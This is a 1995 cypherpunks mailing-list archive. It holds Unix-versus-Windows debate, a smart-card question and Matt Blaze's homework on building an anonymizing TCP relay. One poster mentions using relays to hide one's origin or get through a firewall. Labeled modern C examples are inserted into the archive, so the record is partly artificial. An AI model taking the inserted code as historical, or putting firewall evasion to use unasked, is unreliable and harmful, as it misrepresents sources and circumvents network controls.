Message-ID: <199501300247.SAA06181@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text


> > The only real barrier left to UNIX becoming the OS of choice is 
> > commercial app support (things like word processors and etc. becoming 
> > readily available and inexpensive).
> 
> I agree.  If I could get a WYSIWYG word processor for X that was as 
> robust as MS Word or Wordperfect, I'd be a very camper.

You can.  Wordperfect comes in X flavors.  Be a happy camper.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 29 Jan 95 15:58:54 PST
To: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Subject: Re: Telnet Acrobatics
In-Reply-To: <m0rYiZL-0006TuC@myriad.pc.cc.cmu.edu>
Message-ID: <199501300002.TAA29052@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>What follows are two small programs which I thought might be of interest to
>cypherpunks.  The first (socket.c) is a simple daemon which binds a port
>and accepts connections, and then forks child processes for each one.
>The second (relay.c) is a simple telnet program which opens a connection to
>the specified remote host and port number.  Put together they can be used
>as a telnet relay ("proxy server") that works like the term redir command.
>This in itself is useful, if you want to hide where you're coming in from,
>bypass a broken router or get through a firewall.  But, take a look at the
>loop at the end of the second program.  It simply reads input from one
>socket and writes it to another.  It would seem to me very easy to add
>an encryptor/decryptor to this process and encrypt your telnet sessions.
>You'd just need to exchange a key (via PGP) with the remote system, and
>decide on a port number, then run crypt/dec daemons on both systems.  The
>socket.c program might also be useful for socket-based remailing.  (Tho
>you can set it up in your inetd.conf instead, if you have root access.)

...

This is really funny - these programs are almost *exactly* the first
assignment in the computer networks class that I taught at Columbia last
Spring.  I think these may actually be modified versions of one of the
submissions from one of the students in the course.  (The actual assignment
called for something slightly different from these two programs, but close
enough to make it easy enough to modify.  Assignment sheet attached below
for reference...)

By the way, speaking of encrypted sessions, I'm currently shaking the
bugs out of "esp", an application-level encrypted session manager for Unix
terminal sessions across untrusted networks.  It's based on RSAREF
and 3-DES, and I expect to release it next week or so.  Stay tuned.

-matt

========== assignment1.ms (troff -ms format) attached below ===============
.nr FM 1i
.nr HM .75i
.nr LL 6.9i
.nr PO .85i
.OH ""
.EH ""
.TL
Homework #1: TCP Laundry Service
.AU
CS 4119 - Computer Networks
.AI
Assigned: Thursday, January 27, 1994
Due: Sunday, February 13, 1994, Midnight
.NH
The Problem
.PP
One of the features of the TCP/IP protocol suite is that two communicating
entities each need to know the network address of the other.  In general,
this is a useful property; it makes it possible, for example, for a server
to use the network address of clients who connect to it as part of an
authentication protocol.  An example of this is the
.I rlogin
protocol, in which the server machine uses the network address from which
a request originates to determine whether to ask for a password before letting
the user log in.  (It is worth understanding how this works, by the way,
and the inherent risks of relying on the network for authentication).
.PP
Sometimes, however, it is desirable to offer completely
.I anonymous
services in which the server has no way to determine where a connection to
it originates.  For example, it may be useful to provide the ability for
informants to send anonymous electronic mail to news reporters or law
enforcement agencies.
.PP
Unfortunately, the Internet Protocol (IP) suite does not provide for
anonymous communication.  One way to simulate anonymous communication is
to make use of intermediate "data laundry" servers, whose sole purpose is
to relay traffic between its sources and destinations.  Data laundries derive
their name from the criminal practice of "money laundering", where a
criminal moves his or her loot between several businesses and banks in an
effort to obscure the connection between stealing the money and spending it.
A data laundry accepts connections from clients (or other
laundries) and connects them to whatever remote service (or laundry) they
wish to communicate with.  Since the final destination thinks it is
communicating with the laundry, the only way to determine the real origin
of a connection would be to compromise the security of each of the laundries
along the way.
.NH
The Assignment
.PP
Your job is to build a laundry service for TCP connections.  This should
consist of two parts: a
.I "laundry daemon"
which connects clients to services and a
.I "laundry client"
which provides a convenient front end to users of the service.
Also write a short manual describing how to use your programs.
.NH 2
Laundry Daemon
.PP
The laundry daemon should accept TCP connections on a pre-selected port
number (pick one that isn't already used by some existing service).  When
a connection comes in, it should \fCfork\fP a subprocess for the duration
of the connection and print a message announcing that it is ready:
.DS
\fC100 cs.columbia.edu laundry service ready\fP
.DE
All messages from the daemon should consist of single lines of ASCII text
starting with a three digit number and followed by an informational message.
Message numbers starting with 1 indicate success, message numbers starting
with 2 indicate failure.
.PP
Once the initial ready message is transmitted to the client, the server should
accept a single line of text containing a destination hostname followed by
at least one space followed by a port identifier.  Both the hostname and
port ID should be able to be specified by either their official names
or by their decimal values; you may assume that any identifier starting with a
digit is a numeric, otherwise it is a name.  Examples of valid input:
.DS
\fCcunix.cc.columbia.edu finger
128.59.40.11    79
128.59.40.11   telnet\fP
.DE
The server should then attempt to open a TCP connection to the given
host/port.  If the connection fails for any reason (host unreachable,
name lookup failure, etc.), the server should send an appropriate error
message to the client, e.g.:
.DS
\fC201 cunix.cc.columbia.edu connection refused on port finger\fP
.DE
Otherwise, the server should send a message indicating success:
.DS
\fC101 connected to cunix.cc.columbia.edu port finger\fP
.DE
.PP
Once the connection is established, the daemon should simply relay
all the traffic between the source and destination.  If an error occurs
or the connection to either side of the connection closes, the daemon
should close both sides of the connection and terminate the subprocess.
.PP
Your laundry daemon should be able to handle arbitrarily many connections
simultaneously.  In particular, it should be possible to launder connections
through itself.
.NH 2
Laundry Client
.PP
The laundry client provides a convenient front end to users of the laundry
service.  Its job is to read, from a configuration file, a list of
laundry servers (and the TCP port numbers they run on) followed by
a final destination and port number.  For example:
.DS
\fCa.columbia.edu 10000
b.columbia.edu 10000
cunix.cc.columbia.edu telnet\fP
.DE
would launder a TCP connection to the telnet port of cunix.cc.columbia.edu
through laundry servers running on port 10000 of a.columbia.edu and
b.columbia.edu.
.PP
Once the connection is established, the laundry client should simply connect
its standard input and standard output to the laundered connection.  Upon
EOF at either the remote connection or the standard input, the client
should close the connection and terminate.
.PP
If the connection fails at any point along the laundered path,
the client should print an appropriate error message and terminate.
.NH
Hints
.PP
You'll need to be familiar with the system calls for establishing TCP
connections (socket, connect, bind, etc.), the routines for looking up
host and service names (gethostbyname, etc.), the system calls for
manipulating terminal IO (ioctl), and the system call for multiplexing
input streams (select).
.PP
A common source of errors is to try to bind your service to a port already
in use by another process.  Make sure the port number you're using is
not already in use.  Also, make sure you kill any laundry daemons you've
started when you're done testing your program.
.NH
Extra Credit Ideas
.PP
Make the laundry service fully compatible with the telnet protocol.
.PP
Extend your service to provide encrypted connections. (You'll want to
learn about key exchange protocols.  You'll find the RSAREF library,
available at the rsa.com ftp site, helpful.)
.PP
Extend the laundry service to allow laundered servers as well as clients;
that is, allow a service to set up and accept connections through a chain
of proxy servers.
.PP
For lots of extra credit, make your code available and convince lots of
people to adopt it as a standard.  (This is more work than it's worth!).
.NH
Policy
.PP
Your program will be graded based on whether it works according to the
assignment, how well it handles errors, and the quality of your
documentation and code.
Turn your programs in with the submit program; your TAs will have information
on how to use this.
Late programs will be accepted, but with a reduced grade.  Late programs
cannot get extra credit.
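
The request and reply format from the assignment above, as an added example that is not part of the original message or of any student submission: a bounded parser for the "host port" line and helpers for the three-digit replies. The length caps, the printable-ASCII restriction, the 1-65535 range check and all function names are assumptions of this example.

```c
/* Added example: request-line parser and reply helpers for the laundry
 * protocol in the assignment. Names and limits are hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LAUNDRY_HOST_MAX 255 /* assumption: length caps chosen for this example */
#define LAUNDRY_PORT_MAX 31

struct laundry_req {
    char host[LAUNDRY_HOST_MAX + 1];
    char port[LAUNDRY_PORT_MAX + 1];
    int host_is_numeric; /* first character is a digit, per the assignment */
    int port_is_numeric;
    int port_number;     /* set only when port_is_numeric */
};

enum { REPLY_BAD = -1, REPLY_SUCCESS = 1, REPLY_FAILURE = 2 };

/* Copy one blank-delimited token of printable ASCII into out (cap bytes).
 * Returns the position after the token, or NULL if the token is empty,
 * too long, or contains a control or non-ASCII byte. */
static const char *take_token(const char *p, char *out, size_t cap)
{
    size_t n = 0;

    while (*p == ' ' || *p == '\t')
        p++;
    while (*p && !isspace((unsigned char)*p)) {
        unsigned char c = (unsigned char)*p;
        if (c < 0x21 || c > 0x7e || n + 1 >= cap)
            return NULL;
        out[n++] = *p++;
    }
    out[n] = '\0';
    return n ? p : NULL;
}

/* Parse "host <blanks> port". Returns 0 on success, -1 on a malformed line. */
int laundry_parse_request(const char *line, struct laundry_req *req)
{
    const char *p;
    char *end;
    long v;

    memset(req, 0, sizeof *req);
    if (!(p = take_token(line, req->host, sizeof req->host)))
        return -1;
    if (!(p = take_token(p, req->port, sizeof req->port)))
        return -1;
    while (isspace((unsigned char)*p)) /* allow a trailing CR/LF */
        p++;
    if (*p)
        return -1;                     /* a third token is an error */
    req->host_is_numeric = isdigit((unsigned char)req->host[0]) != 0;
    req->port_is_numeric = isdigit((unsigned char)req->port[0]) != 0;
    if (req->port_is_numeric) {
        v = strtol(req->port, &end, 10);
        if (*end || v < 1 || v > 65535)
            return -1;                 /* "7x", "0" and "70000" all land here */
        req->port_number = (int)v;
    }
    return 0;
}

/* Build "NNN text\n". Codes 100-199 mean success, 200-299 failure.
 * Returns the length written, or -1 if the code is out of range or the
 * line does not fit in buf. */
int laundry_format_reply(char *buf, size_t cap, int code, const char *text)
{
    int n;

    if (code < 100 || code > 299)
        return -1;
    n = snprintf(buf, cap, "%03d %s\n", code, text);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Classify a reply line by its three-digit code. */
int laundry_reply_status(const char *line)
{
    if (!isdigit((unsigned char)line[0]) || !isdigit((unsigned char)line[1]) ||
        !isdigit((unsigned char)line[2]))
        return REPLY_BAD;
    if (line[0] == '1')
        return REPLY_SUCCESS;
    return line[0] == '2' ? REPLY_FAILURE : REPLY_BAD;
}

int main(void)
{
    /* The three valid inputs shown in the assignment. */
    const char *samples[] = { "cunix.cc.columbia.edu finger",
                              "128.59.40.11    79", "128.59.40.11   telnet" };
    struct laundry_req r;
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (laundry_parse_request(samples[i], &r) == 0)
            printf("host=%s (numeric=%d) port=%s (numeric=%d)\n",
                   r.host, r.host_is_numeric, r.port, r.port_is_numeric);
    return 0;
}
```

Because the daemon echoes the client-supplied host and port back in its 1xx and 2xx replies, rejecting control bytes at parse time keeps each reply a single line.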




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 17:29:07 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.3.89.9501291649.A14175-0100000@netcom5>
Message-ID: <Pine.SGI.3.91.950129192639.2535A-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, James A. Donald wrote:

> On Sat, 28 Jan 1995, Joe Turner wrote:
> > Additionally, I don't know of too many operating 
> > systems where the source code is floating around.  I mean so what if 
> > it doesn't come with a pretty shrink wrapped package and a thick 
> > getting-started, if you have a question just go find the source code.  
> > Geez.  
> 
> There are some communities of software developers that have 
> this strange belief that program behavior should conform to user
> expectations instead of the user conforming to the program
> behavior.
> 
> 
> Your other remarks are rational, relevant, appropriate, and correct,
> but this remark illustrates magnificently why unix is
> still user hostile after all these years.

UNIX?  user hostile?  where have you been lately?  ever hear of X 
windows?  Indigo Magic Desktop?  these and zillions of other innovations 
have made UNIX more user-friendly than any other operating system I have 
used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  
The only real barrier left to UNIX becoming the OS of choice is 
commercial app support (things like word processors and etc. becoming 
readily available and inexpensive).

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 29 Jan 95 16:47:19 PST
To: cypherpunks@toad.com
Subject: Re: Telnet Acrobatics
In-Reply-To: <199501300002.TAA29052@crypto.com>
Message-ID: <Qj=3ONS00VolECjl4T@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> This is really funny - these programs are almost *exactly* the first
> assignment in the computer networks class that I taught at Columbia
> last Spring.

These programs are pretty much textbook examples of socket usage, so
it's not too surprising, but that is kind of funny.  I doubt they were
actually copied out of a textbook, as they both had bugs in them, but I
think I have most of the bugs fixed now.  One that I didn't see earlier
when I posted that is that the select loop is missing an
if(FD_ISSET(fd,&readfds)....  It works without it, but not smoothly.  I
found these posted to alt.2600 last summer and they've been sitting on
my hard disk until this weekend when I pulled them out and started
playing with them.

Did any of your students try for the extra credit and add encryption?
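
The fix described in the message above, as an added example rather than the posted relay.c: a select() loop that tests FD_ISSET before each read and loops over short writes. The function names, the stats struct and the socketpair-based check are assumptions of this example, and the descriptors are assumed to be blocking.

```c
/* Added example: select() relay loop that checks FD_ISSET before reading.
 * Names are hypothetical; this is not the relay.c from the thread. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

struct relay_stats {
    long a_to_b; /* bytes copied from a to b */
    long b_to_a; /* bytes copied from b to a */
};

/* Write all n bytes, looping over short writes. Returns 0 or -1. */
static int write_all(int fd, const char *buf, size_t n)
{
    size_t off = 0;

    while (off < n) {
        ssize_t w = write(fd, buf + off, n - off);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        off += (size_t)w;
    }
    return 0;
}

/* Copy one buffer from 'from' to 'to'.
 * Returns bytes copied, 0 on EOF, -1 on error. */
static long pump(int from, int to)
{
    char buf[1024];
    ssize_t n;

    do {
        n = read(from, buf, sizeof buf);
    } while (n < 0 && errno == EINTR);
    if (n <= 0)
        return (long)n;
    return write_all(to, buf, (size_t)n) < 0 ? -1 : (long)n;
}

/* Relay both directions until either side reaches EOF (returns 0) or an
 * error occurs (returns -1). The caller then closes both descriptors. */
int relay(int a, int b, struct relay_stats *st)
{
    int nfds = (a > b ? a : b) + 1;
    fd_set rfds;
    long n;

    st->a_to_b = st->b_to_a = 0;
    for (;;) {
        FD_ZERO(&rfds);
        FD_SET(a, &rfds);
        FD_SET(b, &rfds);
        if (select(nfds, &rfds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        /* Read only from a descriptor that select() reported as ready. */
        if (FD_ISSET(a, &rfds)) {
            if ((n = pump(a, b)) <= 0)
                return (int)n;
            st->a_to_b += n;
        }
        if (FD_ISSET(b, &rfds)) {
            if ((n = pump(b, a)) <= 0)
                return (int)n;
            st->b_to_a += n;
        }
    }
}

/* Constructed check: two socketpairs stand in for the client and server. */
int relay_selfcheck(void)
{
    int c[2], s[2], ok;
    char buf[16];
    struct relay_stats st;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, c) < 0 ||
        socketpair(AF_UNIX, SOCK_STREAM, 0, s) < 0)
        return -1;
    if (write(c[0], "ping", 4) != 4 || write(s[1], "pong", 4) != 4)
        return -1;
    shutdown(c[0], SHUT_WR); /* client is done sending */
    ok = relay(c[1], s[0], &st) == 0 && st.a_to_b == 4 && st.b_to_a == 4 &&
         read(s[1], buf, sizeof buf) == 4 && memcmp(buf, "ping", 4) == 0 &&
         read(c[0], buf, sizeof buf) == 4 && memcmp(buf, "pong", 4) == 0;
    close(c[0]); close(c[1]); close(s[0]); close(s[1]);
    return ok ? 0 : -1;
}

int main(void)
{
    printf("relay self-check: %s\n", relay_selfcheck() == 0 ? "ok" : "FAILED");
    return 0;
}
```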




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 29 Jan 95 18:03:53 PST
To: Spif <c642011@cclabs.missouri.edu>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.SGI.3.91.950129192639.2535A-100000@sgi7.phlab.missouri.edu>
Message-ID: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Spif wrote:

> UNIX?  user hostile?  where have you been lately?  ever hear of X 
> windows?  Indigo Magic Desktop?  these and zillions of other innovations 
> have made UNIX more user-friendly than any other operating system I have 
> used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  

Sorry, I need to disagree here.   The first time I tried to configure X 
for my Linux system, it barfed.  It also spewed on several subsequent 
attempts, and this is with pretty standard hardware.  I finally found an 
X guru locally and he fixed it for me.  At the very least, Windoze and 
OS/2 and NeXT give you graphics out of the box, with no need to spend 
several hours configuring it just to get basics up, and no need to try to 
find some kind of user-oriented documentation to guide you through these 
hassles. 

Now, I like Linux/Unix a lot.  It is really one of the better OSes out 
there, but it isn't very friendly for the person that doesn't know what 
they are doing, especially to configure basic apps.

> The only real barrier left to UNIX becoming the OS of choice is 
> commercial app support (things like word processors and etc. becoming 
> readily available and inexpensive).

I agree.  If I could get a WYSIWYG word processor for X that was as 
robust as MS Word or Wordperfect, I'd be a very camper.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 18:16:10 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SGI.3.91.950129200624.2535E-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Robert A. Hayden wrote:

> On Sun, 29 Jan 1995, Spif wrote:
> 
> > UNIX?  user hostile?  where have you been lately?  ever hear of X 
> > windows?  Indigo Magic Desktop?  these and zillions of other innovations 
> > have made UNIX more user-friendly than any other operating system I have 
> > used (which includes DOS, Windows, OS/2, and NeXTstep, among others).  
> 
> Sorry, I need to disagree here.   The first time I tried to configure X 
> for my Linux system, it barfed.  It also spewed on several subsequent 
> attempts, and this is with pretty standard hardware.  I finally found an 
> X guru locally and he fixed it for me.  At the very least, Windoze and 
> OS/2 and NeXT give you graphics out of the box, with no need to spend 
> several hours configuring it just to get basics up, and no need to try to 
> find some kind of user-oriented documentation to guide you through these 
> hassles. 

XFree86 was a snap to set up on my system, and I'm no guru.  In addition, 
Linux does not occupy the entirety of the UNIX spectrum - SGI systems, 
for example, give you graphics "out of the box", and so do many other 
workstation systems.  Granted, such machines are more expensive, but then 
we're talking about ease-of-use and power here, not cost.

> Now, I like Linux/Unix a lot.  It is really one of the better OSes out 
> there, but it isn't very friendly for the person that doesn't know what 
> they are doing, especially to configure basic apps.

I'm not a UNIX guru, as I said, although I do have some basic UNIX 
knowledge.  Slackware was, for me, one of the easiest installations I 
have ever done on any computer.  It was a breeze.

> > The only real barrier left to UNIX becoming the OS of choice is 
> > commercial app support (things like word processors and etc. becoming 
> > readily available and inexpensive).
> 
> I agree.  If I could get a WYSIWYG word processor for X that was as 
> robust as MS Word or Wordperfect, I'd be a very camper.

in fact, there are versions of Wordperfect (and perhaps MS Word as well) 
for UNIX systems... they're just more expensive and less immediately 
available in the marketplace.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 20:28:53 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300427.UAA21533@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>The only real barrier left to UNIX becoming the OS of choice is 
>commercial app support (things like word processors and etc. becoming 
>readily available and inexpensive).

I don't mean to toss gasoline onto this fire, but......

Unix as we know has a vanishingly small probability of ever becoming 
'mainstream'. There's a two-orders-of-magnitude gap between the installed 
base of Dos/Windows and that of Unix. That gap has grown, not narrowed 
over time. This is however no reflection on the obvious technical merits 
of Unix. Market dominance is based not on technical superiority, but 
rather on technical sufficiency. Once an OS achieves technical 
sufficiency any further technical improvements will have a diminishing 
marginal effect on that OS's market performance. Once the OS is 
technically sufficient, non-technical factors begin to dominate. The 
market failure of WinNT is a classic example of this. Its failure is 
unrelated to its technical merits (or lack thereof), but rather on 
economic and social factors that even a company with the marketing muscle 
of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
example of an even more dismal, perhaps terminal, failure for many of the 
same reasons.)

Dale H.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 29 Jan 95 21:23:25 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300522.VAA17151@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Spif wrote:
>UNIX?  user hostile?  where have you been lately?  

Well, maybe unix gets its reputation for being hostile because of
things like 

* many commands don't work fully (find, for example)
* a large portion choke on input that isn't "expected"
* many more do extremely poor input checking,
* the configuration files are bizarre
* different versions have commands with different options (stty
  everything, ps -ef vs. ps -aux, etc.)
* each version is slightly different (ever try porting a non-trivial
  program?  Look at some available large software and examine the #ifdef
  #define #endif statements; look at the differences in system calls.
  Hell, look at the "config" program that comes with PERL - 80K of stuff
  to build a make file for the flavor of UNIX you are using!)
* the commands don't combine well (often uuencode + sendmail ==
  garbage)
* many commands accept a slightly different regular expression syntax
  than the shell does
* the commands aren't built with ease of use in mind.  For example, to
  kill a process under unix requires that I know its process id.  How
  do I find that?  Run another command...

> ever hear of X windows?

X-Windows is an extreme pain to get working.  Sure, if you buy your
unix workstation the manufacturer will pre-install it.  Just try
setting it up from scratch.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 29 Jan 95 18:34:44 PST
To: "Michael P. Brininstool" <mikepb@freke.lerctr.org>
Subject: Re: Remailer Specs
In-Reply-To: <1995Jan29.153057.11745@freke.lerctr.org>
Message-ID: <Pine.SUN.3.91.950129213242.15218A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Michael P. Brininstool wrote:

> Cypherpunk Type I?  Ok, what are the other types?  Should there be a
> type specification like there is for RAID, or the Body Armor Threat
> levels?

	Currently? Only Mixmaster AKA Cypherpunk Type II. This is part of 
why an official standards document is needed. My specs will include the 
start of an `official' type specification.

[ snip ]
> Should we come up with a similar type of graduated system, and specs
> for each, with some kind of negotiation between remailers, so that they
> can determine what levels to use to communicate with various
> remailers?
> Then we could talk in terms of type 6, for example, having all the
> abilities of levels 1-5 and then some.

	Not a bad idea. I'll see what I can do.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 29 Jan 95 21:40:08 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <199501300539.VAA18044@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Spif wrote:
>so your point, basically, is that the public will settle for whatever it 
>can get, and get easiest and cheapest, when it comes to software and 
>operating systems in particular.  

It always puzzles me that people on the net spend so much time griping
about Microsoft when the net tends towards libertarianism.  I would
think libertarians would welcome Microsoft's dominance, as a
validation of the free market in action.

I'm not saying you are libertarian, of course.

"Dos/Windows + applications available for Dos/Windows" are obviously
blowing out "unix + applications available for unix".

Normal people don't give a damn if source code is available for "power
tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
etc.

They want to cut and paste their spreadsheet charts into the word
processor they use, and email it to coworkers.

>certainly a growing market for internet-capable systems

OS/2 is internet friendly, Windows 95 will be friendly, etc.
Certainly unix will let you do more, but most people won't care about
the value of the extras, as long as a web browser, news reader, and
mail reader is available.

Some people on this list swear they never have to drop to a command
line with the cool tools they use with their SLIP accounts (except to
change their password).  If that's true, then any "advantage" unix has
is washed away.  How will the unix market grow (relative to other more
popular OS's) if internet access tools run the same on Windows and
OS/2 and Mac's as they do on unix?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 22:28:09 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Smart Card architecture
Message-ID: <Chameleon.4.01.950129222758.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been searching around the 'net looking for online references to
the actual protocols and methods used in smart card user authentication,
but have found very little.  I understand from reading Schneier that
there are several established protocols to demonstrate knowledge of
some secret without leaking any information about this secret.  Is this
how these (smart card) systems work?

The Nov. '94 issue of 'Communications of the ACM' has an article about
using smart cards to store secure OS kernel and user configuration
information (I imagine both Unix _and_ Windows :), which is fascinating to 
read, but doesn't delve into these technical details.

It seems that the there are a myriad of rather innovative applications for 
these things.

What is the state of this technology today?  I understand there are working 
systems for use with credit transactions and telephone billing.  Who are the 
major players in the marketplace, what types of standards have evolved to 
describe the interfaces they use, and what kind of Cypherpunk interest is
there in these products?  What kind of realistic attacks exist that would
compromise the security offered by smart cards?

Guess I'm just interested in some good pointers to information (online or 
written) that could give me a grasp on the technical details.

Thanks,

Johnathan Corgan

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyyGmk1Diok8GKihAQE6MQP/dPRmR4X8p459WvgwTiiL+zO/oq1zyE2E
KxD/1JEQ4e6MC7tGNiPktvXqFXtv5JgXxbPhWkUZTQjkEyMulDCv2h0hUGySdiHx
Zq4lvCtCRRdb6r5O+tQJQpCbCW3NRsx3A6yJPK2YvH1lYRciDlMdWDQyGAGefuUN
xO6jMEGnGEw=
=9RjV
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 22:32:04 PST
To: cypherpunks@toad.com
Subject: alt.religion.your.operating.system.sucks
Message-ID: <199501300630.WAA29275@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>so your point, basically, is that the public will settle for whatever 
>it can get, and get easiest and cheapest, when it comes to software and 
>operating systems in particular.  

I think you've grasped the fundamentals!  You'll soon make VP of 
Marketing. <g>



>This may be the case, but there is certainly a growing market for 
>internet-capable systems, and the most internet-friendly OS around is, 
>of course, UNIX.  

OS/2 comes internet-ready and pre-installed and it's still an almost 
complete failure in the market.



>In that fact, and in the growing importance of having an OS that 
>utilizes the full capabilities of increasingly powerful personal 
>computers, lies the future of UNIX.

In any mature market, technical superiority above some baseline level of 
sufficiency has no market value.  The auto market is a classic example 
of this. Look how long tail-fins and chrome have dominated technical 
superiority as the prime focus of marketing.  These are all marketing 
issues not technical issues!

Dale H.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 29 Jan 95 19:34:04 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300247.SAA06181@tower.techwood.org>
Message-ID: <9501300333.AA22987@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Craig A. Johnston" says:
> > I agree.  If I could get a WYSIWYG word processor for X that was as 
> > robust as MS Word or Wordperfect, I'd be a very happy camper.
> 
> You can.  Wordperfect comes in X flavors.  Be a happy camper.

Not to mention IslandWrite, Applix, and other things...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 29 Jan 95 22:35:03 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <v01510102ab5233825e8e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 PM 1/29/95, anonymous-remailer@shell.portal.com wrote:

>Some people on this list swear they never have to drop to a command
>line with the cool tools they use with their SLIP accounts (except to
>change their password).  If that's true, then any "advantage" unix has
>is washed away.  How will the unix market grow (relative to other more
>popular OS's) if internet access tools run the same on Windows and
>OS/2 and Mac's as they do on unix?

It is true, I swear <g>

I am a Mac person. UNIX is pretty far from the Mac OS. Nonetheless, I am
about to buy a cheap 486 (any recommendations?) on which I will install
FreeBSD to run an Internet server. Once Apple will officially release their
dirt cheap multi-processor servers that run A/UX only, I'll probably buy
one of those. Why am I getting a UNIX machine? Because there is nothing out
there in the world of operating systems that does the job as well as UNIX when
it comes to networking.


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 20:44:00 PST
To: Dale Harrison <daleh@ix.netcom.com>
